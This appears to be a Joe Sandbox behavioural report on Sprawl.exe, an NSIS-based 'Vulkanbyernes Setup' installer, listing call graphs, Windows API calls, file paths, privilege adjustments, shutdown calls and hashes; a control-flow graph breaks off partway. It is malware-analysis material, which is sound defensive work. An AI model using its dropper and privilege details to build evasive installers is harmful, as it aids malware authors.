3209 403162 lstrlenA 3208->3209 3209->3206 3210 403171 3209->3210 3211 4060c8 5 API calls 3210->3211 3212 403179 3211->3212 3213 4060c8 5 API calls 3212->3213 3214 403180 #17 OleInitialize SHGetFileInfoA 3213->3214 3292 405d2f lstrcpynA 3214->3292 3216 4031bd GetCommandLineA 3293 405d2f lstrcpynA 3216->3293 3218 4031cf GetModuleHandleA 3219 4031e6 3218->3219 3220 4057cc CharNextA 3219->3220 3221 4031fa CharNextA 3220->3221 3229 40320a 3221->3229 3222 4032d4 3223 4032e7 GetTempPathA 3222->3223 3294 4030de 3223->3294 3225 4032ff 3226 403303 GetWindowsDirectoryA lstrcatA 3225->3226 3227 403359 DeleteFileA 3225->3227 3230 4030de 12 API calls 3226->3230 3304 402c66 GetTickCount GetModuleFileNameA 3227->3304 3228 4057cc CharNextA 3228->3229 3229->3222 3229->3228 3234 4032d6 3229->3234 3233 40331f 3230->3233 3232 40336d 3240 4057cc CharNextA 3232->3240 3274 4033f3 3232->3274 3287 403403 3232->3287 3233->3227 3236 403323 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3233->3236 3388 405d2f lstrcpynA 3234->3388 3238 4030de 12 API calls 3236->3238 3242 403351 3238->3242 3248 403388 3240->3248 3242->3227 3242->3287 3243 40353b 3246 403543 GetCurrentProcess OpenProcessToken 3243->3246 3247 4035bd ExitProcess 3243->3247 3244 40341d 3398 405525 3244->3398 3253 40358e 3246->3253 3254 40355e LookupPrivilegeValueA AdjustTokenPrivileges 3246->3254 3250 403433 3248->3250 3251 4033ce 3248->3251 3402 4054a8 3250->3402 3255 40588f 18 API calls 3251->3255 3257 4060c8 5 API calls 3253->3257 3254->3253 3259 4033d9 3255->3259 3258 403595 3257->3258 3261 4035aa ExitWindowsEx 3258->3261 3264 4035b6 3258->3264 3259->3287 3389 405d2f lstrcpynA 3259->3389 3261->3247 3261->3264 3262 403454 lstrcatA lstrcmpiA 3266 403470 3262->3266 3262->3287 3263 403449 lstrcatA 3263->3262 3269 40140b 2 API calls 3264->3269 3267 403475 3266->3267 3268 40347c 3266->3268 3405 40540e CreateDirectoryA 3267->3405 3410 40548b CreateDirectoryA 3268->3410 3269->3247 3270 4033e8 3390 405d2f lstrcpynA 3270->3390 3332 4036af 3274->3332 3276 403481 SetCurrentDirectoryA 3277 403490 3276->3277 3278 40349b 3276->3278 3413 405d2f lstrcpynA 3277->3413 3414 405d2f lstrcpynA 3278->3414 3281 405d51 18 API calls 3282 4034da DeleteFileA 3281->3282 3283 4034e7 CopyFileA 3282->3283 3289 4034a9 3282->3289 3283->3289 3284 40352f 3286 405bea 38 API calls 3284->3286 3285 405bea 38 API calls 3285->3289 3286->3287 3391 4035d5 3287->3391 3288 405d51 18 API calls 3288->3289 3289->3281 3289->3284 3289->3285 3289->3288 3290 4054c0 2 API calls 3289->3290 3291 40351b CloseHandle 3289->3291 3290->3289 3291->3289 3292->3216 3293->3218 3295 405f9a 5 API calls 3294->3295 3296 4030ea 3295->3296 3297 4030f4 3296->3297 3298 4057a1 3 API calls 3296->3298 3297->3225 3299 4030fc 3298->3299 3300 40548b 2 API calls 3299->3300 3301 403102 3300->3301 3415 4059d1 3301->3415 3419 4059a2 GetFileAttributesA CreateFileA 3304->3419 3306 402ca6 3327 402cb6 3306->3327 3420 405d2f lstrcpynA 3306->3420 3308 402ccc 3309 4057e8 2 API calls 3308->3309 3310 402cd2 3309->3310 3421 405d2f lstrcpynA 3310->3421 3312 402cdd GetFileSize 3313 402dd9 3312->3313 3325 402cf4 3312->3325 3422 402c02 3313->3422 3315 402de2 3317 402e12 GlobalAlloc 3315->3317 3315->3327 3434 4030c7 SetFilePointer 3315->3434 3316 4030b1 ReadFile 3316->3325 3433 4030c7 SetFilePointer 3317->3433 3319 402e45 3323 402c02 6 API calls 3319->3323 3321 402dfb 3324 4030b1 ReadFile 3321->3324 3322 402e2d 3326 402e9f 32 API calls 3322->3326 3323->3327 3328 402e06 3324->3328 3325->3313 3325->3316 3325->3319 3325->3327 3329 402c02 6 API calls 3325->3329 3330 402e39 3326->3330 3327->3232 3328->3317 3328->3327 3329->3325 3330->3327 3330->3330 3331 402e76 SetFilePointer 3330->3331 3331->3327 3333 4060c8 5 API calls 3332->3333 3334 4036c3 3333->3334 3335 4036c9 3334->3335 3336 4036db 3334->3336 3444 405c8d wsprintfA 3335->3444 3337 405c16 3 API calls 3336->3337 3338 403706 3337->3338 3340 403724 lstrcatA 3338->3340 3341 405c16 3 API calls 3338->3341 3342 4036d9 3340->3342 3341->3340 3435 403974 3342->3435 3345 40588f 18 API calls 3346 403756 3345->3346 3347 4037df 3346->3347 3349 405c16 3 API calls 3346->3349 3348 40588f 18 API calls 3347->3348 3350 4037e5 3348->3350 3351 403782 3349->3351 3352 4037f5 LoadImageA 3350->3352 3353 405d51 18 API calls 3350->3353 3351->3347 3359 40379e lstrlenA 3351->3359 3363 4057cc CharNextA 3351->3363 3354 40389b 3352->3354 3355 40381c RegisterClassA 3352->3355 3353->3352 3358 40140b 2 API calls 3354->3358 3356 403852 SystemParametersInfoA CreateWindowExA 3355->3356 3357 4038a5 3355->3357 3356->3354 3357->3287 3362 4038a1 3358->3362 3360 4037d2 3359->3360 3361 4037ac lstrcmpiA 3359->3361 3365 4057a1 3 API calls 3360->3365 3361->3360 3364 4037bc GetFileAttributesA 3361->3364 3362->3357 3368 403974 19 API calls 3362->3368 3366 40379c 3363->3366 3367 4037c8 3364->3367 3369 4037d8 3365->3369 3366->3359 3367->3360 3370 4057e8 2 API calls 3367->3370 3371 4038b2 3368->3371 3445 405d2f lstrcpynA 3369->3445 3370->3360 3373 403941 3371->3373 3374 4038be ShowWindow 3371->3374 3446 40501a OleInitialize 3373->3446 3376 40605a 3 API calls 3374->3376 3378 4038d6 3376->3378 3377 403947 3379 403963 3377->3379 3380 40394b 3377->3380 3381 4038e4 GetClassInfoA 3378->3381 3383 40605a 3 API calls 3378->3383 3382 40140b 2 API calls 3379->3382 3380->3357 3387 40140b 2 API calls 3380->3387 3384 4038f8 GetClassInfoA RegisterClassA 3381->3384 3385 40390e DialogBoxParamA 3381->3385 3382->3357 3383->3381 3384->3385 3386 40140b 2 API calls 3385->3386 3386->3357 3387->3357 3388->3223 3389->3270 3390->3274 3392 4035ed 3391->3392 3393 4035df CloseHandle 3391->3393 3454 40361a 3392->3454 3393->3392 3396 4055d1 69 API calls 3397 40340c OleUninitialize 3396->3397 3397->3243 3397->3244 3399 40553a 3398->3399 3400 40342b ExitProcess 3399->3400 3401 40554e MessageBoxIndirectA 3399->3401 3401->3400 3403 4060c8 5 API calls 3402->3403 3404 403438 lstrcatA 3403->3404 3404->3262 3404->3263 3406 40347a 3405->3406 3407 40545f GetLastError 3405->3407 3406->3276 3407->3406 3408 40546e SetFileSecurityA 3407->3408 3408->3406 3409 405484 GetLastError 3408->3409 3409->3406 3411 40549b 3410->3411 3412 40549f GetLastError 3410->3412 3411->3276 3412->3411 3413->3278 3414->3289 3416 4059dc GetTickCount GetTempFileNameA 3415->3416 3417 40310d 3416->3417 3418 405a09 3416->3418 3417->3225 3418->3416 3418->3417 3419->3306 3420->3308 3421->3312 3423 402c23 3422->3423 3424 402c0b 3422->3424 3427 402c33 GetTickCount 3423->3427 3428 402c2b 3423->3428 3425 402c14 DestroyWindow 3424->3425 3426 402c1b 3424->3426 3425->3426 3426->3315 3430 402c41 CreateDialogParamA ShowWindow 3427->3430 3431 402c64 3427->3431 3429 406104 2 API calls 3428->3429 3432 402c31 3429->3432 3430->3431 3431->3315 3432->3315 3433->3322 3434->3321 3436 403988 3435->3436 3453 405c8d wsprintfA 3436->3453 3438 4039f9 3439 405d51 18 API calls 3438->3439 3440 403a05 SetWindowTextA 3439->3440 3441 403a21 3440->3441 3442 403734 3440->3442 3441->3442 3443 405d51 18 API calls 3441->3443 3442->3345 3443->3441 3444->3342 3445->3347 3447 403f60 SendMessageA 3446->3447 3451 40503d 3447->3451 3448 405064 3449 403f60 SendMessageA 3448->3449 3450 405076 OleUninitialize 3449->3450 3450->3377 3451->3448 3452 401389 2 API calls 3451->3452 3452->3451 3453->3438 3455 403628 3454->3455 3456 40362d FreeLibrary GlobalFree 3455->3456 3457 4035f2 3455->3457 3456->3456 3456->3457 3457->3396 3458 402410 3459 402b44 19 API calls 3458->3459 3460 40241a 3459->3460 3461 402a3a 18 API calls 3460->3461 3462 402423 3461->3462 3463 40242d RegQueryValueExA 3462->3463 3466 4026a6 3462->3466 3464 402453 RegCloseKey 3463->3464 3465 40244d 3463->3465 3464->3466 3465->3464 3469 405c8d wsprintfA 3465->3469 3469->3464 3470 401f90 3471 401fa2 3470->3471 3481 402050 3470->3481 3472 402a3a 18 API calls 3471->3472 3473 401fa9 3472->3473 3475 402a3a 18 API calls 3473->3475 3474 401423 25 API calls 3476 4021c9 3474->3476 3477 401fb2 3475->3477 3478 401fc7 LoadLibraryExA 3477->3478 3479 401fba GetModuleHandleA 3477->3479 3480 401fd7 GetProcAddress 3478->3480 3478->3481 3479->3478 3479->3480 3482 402023 3480->3482 3483 401fe6 3480->3483 3481->3474 3484 404f48 25 API calls 3482->3484 3486 401ff6 3483->3486 3488 401423 3483->3488 3484->3486 3486->3476 3487 402044 FreeLibrary 3486->3487 3487->3476 3489 404f48 25 API calls 3488->3489 3490 401431 3489->3490 3490->3486 4023 401490 4024 404f48 25 API calls 4023->4024 4025 401497 4024->4025 3627 401595 3628 402a3a 18 API calls 3627->3628 3629 40159c SetFileAttributesA 3628->3629 3630 4015ae 3629->3630 4026 402616 4027 40261d 4026->4027 4028 40287c 4026->4028 4029 402a1d 18 API calls 4027->4029 4030 402628 4029->4030 4031 40262f SetFilePointer 4030->4031 4031->4028 4032 40263f 4031->4032 4034 405c8d wsprintfA 4032->4034 4034->4028 4035 401717 4036 402a3a 18 API calls 4035->4036 4037 40171e SearchPathA 4036->4037 4038 401739 4037->4038 4039 402519 4040 40252e 4039->4040 4041 40251e 4039->4041 4043 402a3a 18 API calls 4040->4043 4042 402a1d 18 API calls 4041->4042 4044 402527 4042->4044 4045 402535 lstrlenA 4043->4045 4046 405a49 WriteFile 4044->4046 4047 402557 4044->4047 4045->4044 4046->4047 4048 40149d 4049 4014ab PostQuitMessage 4048->4049 4050 40226e 4048->4050 4049->4050 4051 4046a3 4052 4046b3 4051->4052 4053 4046cf 4051->4053 4062 405509 GetDlgItemTextA 4052->4062 4055 404702 4053->4055 4056 4046d5 SHGetPathFromIDListA 4053->4056 4058 4046e5 4056->4058 4061 4046ec SendMessageA 4056->4061 4057 4046c0 SendMessageA 4057->4053 4059 40140b 2 API calls 4058->4059 4059->4061 4061->4055 4062->4057 4063 401ca7 4064 402a1d 18 API calls 4063->4064 4065 401cae 4064->4065 4066 402a1d 18 API calls 4065->4066 4067 401cb6 GetDlgItem 4066->4067 4068 402513 4067->4068 4069 404028 lstrcpynA lstrlenA 3076 40192a 3077 40192c 3076->3077 3078 402a3a 18 API calls 3077->3078 3079 401931 3078->3079 3082 4055d1 3079->3082 3122 40588f 3082->3122 3085 405610 3088 405748 3085->3088 3136 405d2f lstrcpynA 3085->3136 3086 4055f9 DeleteFileA 3087 40193a 3086->3087 3088->3087 3154 406033 FindFirstFileA 3088->3154 3090 405636 3091 405649 3090->3091 3092 40563c lstrcatA 3090->3092 3137 4057e8 lstrlenA 3091->3137 3094 40564f 3092->3094 3097 40565d lstrcatA 3094->3097 3099 405668 lstrlenA FindFirstFileA 3094->3099 3097->3099 3098 405766 3157 4057a1 lstrlenA CharPrevA 3098->3157 3100 40573e 3099->3100 3120 40568c 3099->3120 3100->3088 3102 4057cc CharNextA 3102->3120 3104 405589 5 API calls 3105 405778 3104->3105 3106 405792 3105->3106 3107 40577c 3105->3107 3108 404f48 25 API calls 3106->3108 3107->3087 3112 404f48 25 API calls 3107->3112 3108->3087 3109 40571d FindNextFileA 3111 405735 FindClose 3109->3111 3109->3120 3111->3100 3113 405789 3112->3113 3115 405bea 38 API calls 3113->3115 3116 405790 3115->3116 3116->3087 3117 4055d1 62 API calls 3117->3120 3118 404f48 25 API calls 3118->3109 3119 404f48 25 API calls 3119->3120 3120->3102 3120->3109 3120->3117 3120->3118 3120->3119 3141 405d2f lstrcpynA 3120->3141 3142 405589 3120->3142 3150 405bea MoveFileExA 3120->3150 3160 405d2f lstrcpynA 3122->3160 3124 4058a0 3161 40583a CharNextA CharNextA 3124->3161 3127 4055f1 3127->3085 3127->3086 3128 405f9a 5 API calls 3134 4058b6 3128->3134 3129 4058e1 lstrlenA 3130 4058ec 3129->3130 3129->3134 3132 4057a1 3 API calls 3130->3132 3131 406033 2 API calls 3131->3134 3133 4058f1 GetFileAttributesA 3132->3133 3133->3127 3134->3127 3134->3129 3134->3131 3135 4057e8 2 API calls 3134->3135 3135->3129 3136->3090 3138 4057f5 3137->3138 3139 405806 3138->3139 3140 4057fa CharPrevA 3138->3140 3139->3094 3140->3138 3140->3139 3141->3120 3167 40597d GetFileAttributesA 3142->3167 3145 4055a4 RemoveDirectoryA 3147 4055b2 3145->3147 3146 4055ac DeleteFileA 3146->3147 3148 4055b6 3147->3148 3149 4055c2 SetFileAttributesA 3147->3149 3148->3120 3149->3148 3151 405c0b 3150->3151 3152 405bfe 3150->3152 3151->3120 3170 405a78 lstrcpyA 3152->3170 3155 405762 3154->3155 3156 406049 FindClose 3154->3156 3155->3087 3155->3098 3156->3155 3158 40576c 3157->3158 3159 4057bb lstrcatA 3157->3159 3158->3104 3159->3158 3160->3124 3162 405855 3161->3162 3165 405865 3161->3165 3163 405860 CharNextA 3162->3163 3162->3165 3166 405885 3163->3166 3164 4057cc CharNextA 3164->3165 3165->3164 3165->3166 3166->3127 3166->3128 3168 405595 3167->3168 3169 40598f SetFileAttributesA 3167->3169 3168->3145 3168->3146 3168->3148 3169->3168 3171 405aa0 3170->3171 3172 405ac6 GetShortPathNameA 3170->3172 3197 4059a2 GetFileAttributesA CreateFileA 3171->3197 3174 405be5 3172->3174 3175 405adb 3172->3175 3174->3151 3175->3174 3177 405ae3 wsprintfA 3175->3177 3176 405aaa CloseHandle GetShortPathNameA 3176->3174 3179 405abe 3176->3179 3178 405d51 18 API calls 3177->3178 3180 405b0b 3178->3180 3179->3172 3179->3174 3198 4059a2 GetFileAttributesA CreateFileA 3180->3198 3182 405b18 3182->3174 3183 405b27 GetFileSize GlobalAlloc 3182->3183 3184 405b49 3183->3184 3185 405bde CloseHandle 3183->3185 3186 405a1a ReadFile 3184->3186 3185->3174 3187 405b51 3186->3187 3187->3185 3199 405907 lstrlenA 3187->3199 3190 405b68 lstrcpyA 3193 405b8a 3190->3193 3191 405b7c 3192 405907 4 API calls 3191->3192 3192->3193 3194 405bc1 SetFilePointer 3193->3194 3195 405a49 WriteFile 3194->3195 3196 405bd7 GlobalFree 3195->3196 3196->3185 3197->3176 3198->3182 3200 405948 lstrlenA 3199->3200 3201 405950 3200->3201 3202 405921 lstrcmpiA 3200->3202 3201->3190 3201->3191 3202->3201 3203 40593f CharNextA 3202->3203 3203->3200 4070 4028aa SendMessageA 4071 4028c4 InvalidateRect 4070->4071 4072 4028cf 4070->4072 4071->4072 3607 4015b3 3608 402a3a 18 API calls 3607->3608 3609 4015ba 3608->3609 3610 40583a 4 API calls 3609->3610 3624 4015c2 3610->3624 3611 40161c 3613 401621 3611->3613 3614 40164a 3611->3614 3612 4057cc CharNextA 3612->3624 3615 401423 25 API calls 3613->3615 3617 401423 25 API calls 3614->3617 3616 401628 3615->3616 3626 405d2f lstrcpynA 3616->3626 3623 401642 3617->3623 3618 40548b 2 API calls 3618->3624 3620 4054a8 5 API calls 3620->3624 3621 401633 SetCurrentDirectoryA 3621->3623 3622 401604 GetFileAttributesA 3622->3624 3624->3611 3624->3612 3624->3618 3624->3620 3624->3622 3625 40540e 4 API calls 3624->3625 3625->3624 3626->3621 4073 4016b3 4074 402a3a 18 API calls 4073->4074 4075 4016b9 GetFullPathNameA 4074->4075 4076 4016d0 4075->4076 4077 4016f1 4075->4077 4076->4077 4080 406033 2 API calls 4076->4080 4078 401705 GetShortPathNameA 4077->4078 4079 4028cf 4077->4079 4078->4079 4081 4016e1 4080->4081 4081->4077 4083 405d2f lstrcpynA 4081->4083 4083->4077 4084 4014b7 4085 4014bd 4084->4085 4086 401389 2 API calls 4085->4086 4087 4014c5 4086->4087 4088 401d38 GetDC GetDeviceCaps 4089 402a1d 18 API calls 4088->4089 4090 401d56 MulDiv ReleaseDC 4089->4090 4091 402a1d 18 API calls 4090->4091 4092 401d75 4091->4092 4093 405d51 18 API calls 4092->4093 4094 401dae CreateFontIndirectA 4093->4094 4095 402513 4094->4095 3631 404ebc 3632 404ee0 3631->3632 3633 404ecc 3631->3633 3636 404ee8 IsWindowVisible 3632->3636 3643 404f08 3632->3643 3634 404ed2 3633->3634 3635 404f29 3633->3635 3638 403f60 SendMessageA 3634->3638 3637 404f2e CallWindowProcA 3635->3637 3636->3635 3639 404ef5 3636->3639 3640 404edc 3637->3640 3638->3640 3641 404813 5 API calls 3639->3641 3642 404eff 3641->3642 3642->3643 3643->3637 3644 404893 4 API calls 3643->3644 3644->3635 3645 40173e 3646 402a3a 18 API calls 3645->3646 3647 401745 3646->3647 3648 4059d1 2 API calls 3647->3648 3649 40174c 3648->3649 3650 4059d1 2 API calls 3649->3650 3650->3649 4096 401ebe 4097 402a3a 18 API calls 4096->4097 4098 401ec5 4097->4098 4099 406033 2 API calls 4098->4099 4100 401ecb 4099->4100 4102 401edd 4100->4102 4103 405c8d wsprintfA 4100->4103 4103->4102 4104 40193f 4105 402a3a 18 API calls 4104->4105 4106 401946 lstrlenA 4105->4106 4107 402513 4106->4107

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 40310f-403144 SetErrorMode GetVersion 1 403146-40314e call 4060c8 0->1 2 403157 0->2 1->2 8 403150 1->8 4 40315c-40316f call 40605a lstrlenA 2->4 9 403171-4031e4 call 4060c8 * 2 #17 OleInitialize SHGetFileInfoA call 405d2f GetCommandLineA call 405d2f GetModuleHandleA 4->9 8->2 18 4031f0-403205 call 4057cc CharNextA 9->18 19 4031e6-4031eb 9->19 22 4032ca-4032ce 18->22 19->18 23 4032d4 22->23 24 40320a-40320d 22->24 27 4032e7-403301 GetTempPathA call 4030de 23->27 25 403215-40321d 24->25 26 40320f-403213 24->26 28 403225-403228 25->28 29 40321f-403220 25->29 26->25 26->26 36 403303-403321 GetWindowsDirectoryA lstrcatA call 4030de 27->36 37 403359-403373 DeleteFileA call 402c66 27->37 31 4032ba-4032c7 call 4057cc 28->31 32 40322e-403232 28->32 29->28 31->22 47 4032c9 31->47 34 403234-40323a 32->34 35 40324a-403277 32->35 39 403240 34->39 40 40323c-40323e 34->40 41 403279-40327f 35->41 42 40328a-4032b8 35->42 36->37 55 403323-403353 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030de 36->55 52 403407-403417 call 4035d5 OleUninitialize 37->52 53 403379-40337f 37->53 39->35 40->35 40->39 48 403281-403283 41->48 49 403285 41->49 42->31 51 4032d6-4032e2 call 405d2f 42->51 47->22 48->42 48->49 49->42 51->27 66 40353b-403541 52->66 67 40341d-40342d call 405525 ExitProcess 52->67 56 403381-40338c call 4057cc 53->56 57 4033f7-4033fe call 4036af 53->57 55->37 55->52 68 4033c2-4033cc 56->68 69 40338e-4033b7 56->69 64 403403 57->64 64->52 71 403543-40355c GetCurrentProcess OpenProcessToken 66->71 72 4035bd-4035c5 66->72 76 403433-403447 call 4054a8 lstrcatA 68->76 77 4033ce-4033db call 40588f 68->77 73 4033b9-4033bb 69->73 79 40358e-40359c call 4060c8 71->79 80 40355e-403588 LookupPrivilegeValueA AdjustTokenPrivileges 71->80 74 4035c7 72->74 75 4035cb-4035cf ExitProcess 72->75 73->68 81 4033bd-4033c0 73->81 74->75 91 403454-40346e lstrcatA lstrcmpiA 76->91 92 403449-40344f lstrcatA 76->92 77->52 90 4033dd-4033f3 call 405d2f * 2 77->90 88 4035aa-4035b4 ExitWindowsEx 79->88 89 40359e-4035a8 79->89 80->79 81->68 81->73 88->72 93 4035b6-4035b8 call 40140b 88->93 89->88 89->93 90->57 91->52 95 403470-403473 91->95 92->91 93->72 96 403475-40347a call 40540e 95->96 97 40347c call 40548b 95->97 106 403481-40348e SetCurrentDirectoryA 96->106 97->106 107 403490-403496 call 405d2f 106->107 108 40349b-4034c3 call 405d2f 106->108 107->108 112 4034c9-4034e5 call 405d51 DeleteFileA 108->112 115 403526-40352d 112->115 116 4034e7-4034f7 CopyFileA 112->116 115->112 117 40352f-403536 call 405bea 115->117 116->115 118 4034f9-403519 call 405bea call 405d51 call 4054c0 116->118 117->52 118->115 127 40351b-403522 CloseHandle 118->127 127->115
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE ref: 00403134
                                                                                                                            • GetVersion.KERNEL32 ref: 0040313A
                                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
                                                                                                                            • #17.COMCTL32(00000007,00000009), ref: 00403185
                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040318C
                                                                                                                            • SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
                                                                                                                            • GetCommandLineA.KERNEL32(Vulkanbyernes Setup,NSIS Error), ref: 004031BD
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Sprawl.exe",00000000), ref: 004031D0
                                                                                                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Sprawl.exe",00000020), ref: 004031FB
                                                                                                                            • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032F8
                                                                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403309
                                                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403315
                                                                                                                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403329
                                                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403331
                                                                                                                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403342
                                                                                                                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
                                                                                                                            • DeleteFileA.KERNELBASE(1033), ref: 0040335E
                                                                                                                              • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                                              • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                                            • OleUninitialize.OLE32(?), ref: 0040340C
                                                                                                                            • ExitProcess.KERNEL32 ref: 0040342D
                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403551
                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
                                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
                                                                                                                            • ExitProcess.KERNEL32 ref: 004035CF
                                                                                                                              • Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                                                                            • String ID: "$"C:\Users\user\Desktop\Sprawl.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\Desktop$C:\Users\user\Desktop\Sprawl.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$Vulkanbyernes Setup$\Temp$`K$v$~nsu
                                                                                                                            • API String ID: 3329125770-2255513630
                                                                                                                            • Opcode ID: dcb38b1e2b76dc19c0501d8e0158ad62898b17a6a9361bfb335ac8dc35fe19f6
                                                                                                                            • Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
                                                                                                                            • Opcode Fuzzy Hash: dcb38b1e2b76dc19c0501d8e0158ad62898b17a6a9361bfb335ac8dc35fe19f6
                                                                                                                            • Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 128 4048c5-404911 GetDlgItem * 2 129 404b31-404b38 128->129 130 404917-4049ab GlobalAlloc LoadBitmapA SetWindowLongA ImageList_Create ImageList_AddMasked SendMessageA * 2 128->130 131 404b3a-404b4a 129->131 132 404b4c 129->132 133 4049ba-4049c1 DeleteObject 130->133 134 4049ad-4049b8 SendMessageA 130->134 135 404b4f-404b58 131->135 132->135 136 4049c3-4049cb 133->136 134->133 137 404b63-404b69 135->137 138 404b5a-404b5d 135->138 139 4049f4-4049f8 136->139 140 4049cd-4049d0 136->140 145 404b78-404b7f 137->145 146 404b6b-404b72 137->146 138->137 142 404c47-404c4e 138->142 139->136 141 4049fa-404a26 call 403f14 * 2 139->141 143 4049d2 140->143 144 4049d5-4049f2 call 405d51 SendMessageA * 2 140->144 184 404af0-404b03 GetWindowLongA SetWindowLongA 141->184 185 404a2c-404a32 141->185 151 404c50-404c56 142->151 152 404cbf-404cc7 142->152 143->144 144->139 148 404b81-404b84 145->148 149 404bf4-404bf7 145->149 146->142 146->145 157 404b86-404b8d 148->157 158 404b8f-404ba4 call 404813 148->158 149->142 153 404bf9-404c03 149->153 160 404ea7-404eb9 call 403f7b 151->160 161 404c5c-404c66 151->161 155 404cd1-404cd8 152->155 156 404cc9-404ccf SendMessageA 152->156 163 404c13-404c1d 153->163 164 404c05-404c11 SendMessageA 153->164 165 404cda-404ce1 155->165 166 404d0c-404d13 155->166 156->155 157->149 157->158 158->149 183 404ba6-404bb7 158->183 161->160 169 404c6c-404c7b SendMessageA 161->169 163->142 171 404c1f-404c29 163->171 164->163 172 404ce3-404ce4 ImageList_Destroy 165->172 173 404cea-404cf1 165->173 176 404e69-404e70 166->176 177 404d19-404d25 call 4011ef 166->177 169->160 178 404c81-404c92 SendMessageA 169->178 179 404c3a-404c44 171->179 180 404c2b-404c38 171->180 172->173 181 404cf3-404cf4 GlobalFree 173->181 182 404cfa-404d06 173->182 176->160 189 404e72-404e79 176->189 202 404d35-404d38 177->202 203 404d27-404d2a 177->203 187 404c94-404c9a 178->187 188 404c9c-404c9e 178->188 179->142 180->142 181->182 182->166 183->149 191 404bb9-404bbb 183->191 190 404b09-404b0d 184->190 192 404a35-404a3b 185->192 187->188 194 404c9f-404cb8 call 401299 SendMessageA 187->194 188->194 189->160 195 404e7b-404ea5 ShowWindow GetDlgItem ShowWindow 189->195 196 404b27-404b2f call 403f49 190->196 197 404b0f-404b22 ShowWindow call 403f49 190->197 198 404bbd-404bc4 191->198 199 404bce 191->199 200 404ad1-404ae4 192->200 201 404a41-404a69 192->201 194->152 195->160 196->129 197->160 210 404bc6-404bc8 198->210 211 404bca-404bcc 198->211 214 404bd1-404bed call 40117d 199->214 200->192 205 404aea-404aee 200->205 212 404aa3-404aa5 201->212 213 404a6b-404aa1 SendMessageA 201->213 206 404d79-404d9d call 4011ef 202->206 207 404d3a-404d53 call 4012e2 call 401299 202->207 215 404d2c 203->215 216 404d2d-404d30 call 404893 203->216 205->184 205->190 230 404da3 206->230 231 404e3f-404e53 InvalidateRect 206->231 236 404d63-404d72 SendMessageA 207->236 237 404d55-404d5b 207->237 210->214 211->214 